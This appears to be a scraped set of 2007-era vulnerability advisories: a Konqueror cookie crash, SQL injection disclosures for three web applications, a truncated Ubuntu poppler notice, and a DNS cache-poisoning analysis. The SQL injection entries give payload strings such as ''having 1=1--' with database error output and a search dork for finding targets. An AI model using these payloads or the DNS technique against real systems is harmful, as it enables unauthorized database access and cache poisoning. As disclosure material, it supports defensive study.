Application: Konqueror <= 3.5.6 Web Site: http://www.konqueror.org/ Platform: Unix Bug: Remote Denial of service --- 1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits === 1) Introduction === "Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)." == 2) Bug == Konqueror doesn't handle big cookies, so when a big cookie is sended , konqueror will crash. = 3)Proof of concept = Proof of concept example : 4)Greets Berga,team soh, #futurezone, #soh = 5)Credits = laurent gaffiƩ
Free Forums "search" Sql Injection
http://Aria-Security.net Aria-Security Team Free Forums Sql Injection Vendor: http://www.nvecs.com/forums the search parameter hast an sql injection example: 'having 1=1-- result: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'. or just a simple ' [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'. Regards, The-0utl4w Credit Goes to Aria-Security Team
[USN-542-1] poppler vulnerabilities
=== Ubuntu Security Notice USN-542-1 November 14, 2007 poppler vulnerabilities CVE-2007-4352, CVE-2007-5392, CVE-2007-5393 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libpoppler1 0.5.1-0ubuntu7.3 Ubuntu 6.10: libpoppler1 0.5.4-0ubuntu4.3 Ubuntu 7.04: libpoppler1 0.5.4-0ubuntu8.2 Ubuntu 7.10: libpoppler2 0.6-0ubuntu2.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Secunia Research discovered several vulnerabilities in poppler. If a user were tricked into loading a specially crafted PDF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the user's privileges in applications linked against poppler. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1-0ubuntu7.3.diff.gz Size/MD5:13723 de1ce45e247a20da92e2d4ce28f6b1da http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1-0ubuntu7.3.dsc Size/MD5: 1726 f1fc9c7a57900ec4a95e876ee456af01 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1.orig.tar.gz Size/MD5: 954930 a136cd731892f4570933034ba97c8704 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.3_amd64.deb Size/MD5: 719708 5829b9a7443db4b8990332c9c4421af9 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.3_amd64.deb Size/MD5:57358 12078e124a1fa77b4ce163512755d103 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.3_amd64.deb Size/MD5:46530 70c53e774780530aa1c29bc39f196b68 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.3_amd64.deb Size/MD5:52154 14669fc614d4559abe0ca9be4c86b4ce http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.3_amd64.deb Size/MD5:42760 f74761220dcff353efa9b8057d063572 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.3_amd64.deb Size/MD5: 536894 f891b6822f932ffc5a48815b495b9121 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.5.1-0ubuntu7.3_amd64.deb Size/MD5: 100130 93a0c933a02e2176ab2373eb682cffbe i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.3_i386.deb Size/MD5: 651542 adbc3f7a9e77ca831bd891baac06467e http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.3_i386.deb Size/MD5:54066 4cfde0d813513751b1b1f71b62a0d06b http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.3_i386.deb Size/MD5:44526 5f309b5d31e6c5381adef2d5fa39e2c0 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.3_i386.deb Size/MD5:50054 03d6a676b01c9f3679df557f366d48ad http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.3_i386.deb Size/MD5:41638 4c5415d6f372a45d824ea9243ef7783f http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.3_i386.deb Size/MD5: 494728 f7e55f6225b26c6fc6125195172afecd http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.5.1-0ubuntu7.3_i386.deb Size/MD5:93296 820b58721f7e46b80e5da1401312d41a powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.3_powerpc.deb Size/MD5: 758858 2b5de0f3ff9b691d2c71f2c9f1d2e3ba http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.3_powerpc.deb Size/MD5:59360 645f249176095d2a5979d8481f6ae7d7 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.3_powerpc.deb Size/MD5:46656 51219b4102d2013f18242a7ce008f9ca http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.3_powerpc.deb Size/MD5:53368 11ce688c3919cb624ef4eafebf51ab84 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.3_powerpc.deb Size/MD5:44010 c6cc029b452d0f5d55aa6cb279d1f186 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.3_po
Predictable DNS transaction IDs in Microsoft DNS Server
1) Summary Affected software: Microsoft Windows 2003 SP2, Microsoft Windows 2000 SP4 Server Vendor URL: www.microsoft.com Severity: Medium References: Microsoft Security Bulletin MS07-062, CVE-2007-3898 2) Vulnerability Description Microsoft DNS server generates predictable DNS transaction IDs. If the server is configured to allow recursive queries it is possible to insert fake records in the DNS cache (DNS cache poisoning) by guessing the next transaction ID that the server will use and sending a spoofed DNS reply to the server. To observe the transaction IDs an attacker needs to control a DNS server that is authoritative for some domain and to be able to send a recursive queries to the caching Microsoft DNS server. When an attacker sends a recursive query to a caching name server, the caching server will find the server authoritative for the zone and send the request to the authoritative name server. If the attacker can predict the transaction ID of the request that the caching server sends, he can generate spoofed replies. The caching server will accept spoofed reply as coming from authoritative name server and cache the fake data. The attack scenario is as follows. The attacker controls the authoritative name server for some zone, in our example cache-poisoning.net. The victim has a recursive DNS server that the attacker can query (ns.victim.com). Victim's server runs Microsft DNS server. Attacker wants victim's DNS cache to think that www.hotmail.com has IP address 127.0.0.1 (or any other). First the attacker gathers a sample of DNS transaction IDs that ns.victim.com uses for outgoing queries. He makes a number of recursive queries to ns.victim.com for hosts in cache-poisoning.net zone. Ns.victim.com will query the name server for cache-poisoning.net. The attacker records the transaction IDs of the requests sent to the name server of cache-poisoning.net by ns.victim.com. Microsoft DNS transaction IDs follow a certain pattern. There seems to be 8 independent counters that are randomly incremented. Each transaction ID is taken from a randomly chosen counter. So, there are 8 sequences of randomly incrementing numbers. A sample of transaction IDs below illustrates that: 15222 - sequence 1 13177 - sequence 2 2944 - sequence 3 13197 - sequence 2, 13197 > 13177 increment=20 9108 - sequence 4 13208 - sequence 2, 13208 > 13197 increment=11 15268 - sequence 5 9131 - sequence 4, 9131 > 9108 increment=23 7094 - sequence 6 15291 - sequence 5, increment = 23 960 - sequence 7 15309 - sequence 5, increment = 18 980 - sequence 7, increment = 20 3032 - sequence 8 992 - sequence 7, increment = 12 ... Having gathered a small sample of transaction IDs (50 to 100 is enough) used by the cache, the attacker can record the state of each of the 8 counters on the victim server. The attacker will then query the victim server for the record he is trying to spoof, for example www.hotmail.com. The victim cache will send a query to the authoritative name server for hotmail.com. At the same time the attacker will send a number of spoofed DNS replies. The replies will have spoofed source address (appearing to come from the nameserver for hotmail.com), fake data (saying that www.hotmail.com is 127.0.0.1) and DNS transaction IDs starting from the recorded values of counters up to counter+500 (or more). In our testing, the attacker has a very good chance of hitting the right transaction ID. If the reply with the right transaction ID spoofed by the attacker will arrive before the reply from the real server, the victim cache will believe the spoofed reply and cache it. The attack is made easier because Microsoft DNS server uses fixed source port for the queries (so the attacker doesn't need to guess the source port) and usually queries the first nameserver for the domain (so the attacker only has to spoof the replies from one IP address). In our testing we were able to reliably inject spoofed replies into the cache. The success of the attack depends on how busy a DNS cache is. If it is performing a lot of queries (using up transaction IDs) the attacker will only see a small fraction of IDs. It will be more difficult for the attacker to figure out the state of the counters and to predict the value of the transaction IDs. It is commonly believed that if a caching DNS server is behind a firewall and it is not possible to query it from the outside, it would not be possible to perform a cache poisoning attack like the one discussed above. Unfortunately, this is not the case. An attacker can create a web page and entice someone inside the firewall to surf to this page. The page will contain images located at hosts in attacker-controlled domain. For example: http://h1.cache-poisoning.net/image.gif";> http://h2.cache-poisoning.net/image.gif";> ... http://h100.cache-poisoning.net/image.gif";> When the victim browser's renders the page, it will make DNS queries to the DNS cache. The DNS cache will make queries to the name server for
Aria-Security.Net: MetaCart SQL Injection
Aria-Security Team, http://Aria-Security.net --- Shout Outs: AurA, imm02tal Vendor: http://metalinks.com/ http://site.ltd/metacartpath/productsByCategory.asp?intCatalogID=['SQL INJECTION] Regards, The-0utl4w Credits Goes To Aria-Security.Net
DocuSafe "Search" SQL Injection
DocuSafe "Search" SQL Injection Aria-Security Team, http://Aria-Security.net --- Shout Outs: AurA, imm02tal Vendor: http://gartha.net Google Search: intitle:Corporate Contact System insert your command in the section "search" example: 'having 1=1-- Result: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'. or 'group by tblMain.fldArtNr having 1=1-- result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'. /includes/common.asp, line 62 Regards, The-0utl4w Credits Goes To Aria-Security.Net
